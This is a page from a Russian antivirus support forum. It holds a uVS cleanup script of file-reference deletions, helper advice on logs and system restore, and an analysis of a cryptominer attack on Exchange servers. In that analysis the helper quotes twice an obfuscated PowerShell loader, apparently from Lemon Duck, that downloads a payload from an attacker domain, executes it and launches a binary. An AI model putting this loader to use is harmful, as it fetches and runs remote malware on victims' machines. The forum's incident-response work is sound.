delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.99\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.82\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.93\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.72\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.143.57\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.145.49\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE_64.DLL
delref %Sys32%\TETHERINGSETTINGHANDLER.DLL
delref %Sys32%\QUICKACTIONSPS.DLL
delref %Sys32%\VAILAUDIOPROXY.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.49\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.133.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.41\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.99\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\TAPILUA.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.82\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\UPDATEDEPLOYMENTPROVIDER.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.93\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDHWDECODER_32.DLL
delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL
delref %SystemRoot%\SYSWOW64\MAPSBTSVCPROXY.DLL
delref D:\CHECKVER.OCX
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.72\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE
delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL
delref D:\DRIVERCDHTML.OCX
delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.143.57\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDH265ENC32.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\NVENCMFTH264.DLL
delref %SystemRoot%\SYSWOW64\WPCREFRESHTASK.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMF-MFT-MJPEG-DECODER32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.145.49\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\NVDECMFTMJPEG.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\RMSROAMINGSECURITY.DLL
delref %SystemRoot%\SYSWOW64\SYSTEMSETTINGSBROKER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\SMARTSCREEN.EXE
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDH264ENC32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.49\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.133.5\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL
delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\WIREDNETWORKCSP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE.DLL
delref D:\AUTORUN.EXE
delref I:\HISUITEDOWNLOADER.EXE
delref D:\HISUITEDOWNLOADER.EXE
delref D:\STARTME.EXE
delref H:\HISUITEDOWNLOADER.EXE
delref %SystemDrive%\USERS\ALEX\APPDATA\LOCAL\ESET\ESETONLINESCANNER\ESETONLINESCANNER.EXE
delref G:\ГАРРИ\SYSTEM\HP.EXE
delref G:\ГАРРИ\UNINST.EXE
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
далее,

сделайте проверку в FRST
http://forum.esetnod32.ru/forum9/topic2798/

[ Как создать образ автозапуска? ]

Перейти

это вирус?

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 13.08.2021 15:20:35

добавьте лог выполнения скрипта
это может быть файл в таком виде в папке, откуда вы запускали uVS
2021-08-12_19-22-04_log.txt
+
если проблема актуальна,
пробуйте откатить систему на ближайшую свежую точку точку восстановления. (до даты применения скрипта)

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] запуск майнера на серверах с MS Exchange 2013

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 13.08.2021 10:56:20

Цитата
RP55 RP55 написал: + https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

здесь RP55, скорее прав,
что атака была и с этой стороны, судя по тому, что в одном из апрельских образов (на другом почт сервере), запускался такой скрипт.

Код
"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^\|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^\|Get-Random -Count 100));test1 -PEBytes $bin\|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe

Код

"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe

но там после уст патчей все затихло сразу. те данная атака прекратилась.

(хотя и не факт, что именно они сейчас запускают майнер)

[ Как создать образ автозапуска? ]

Перейти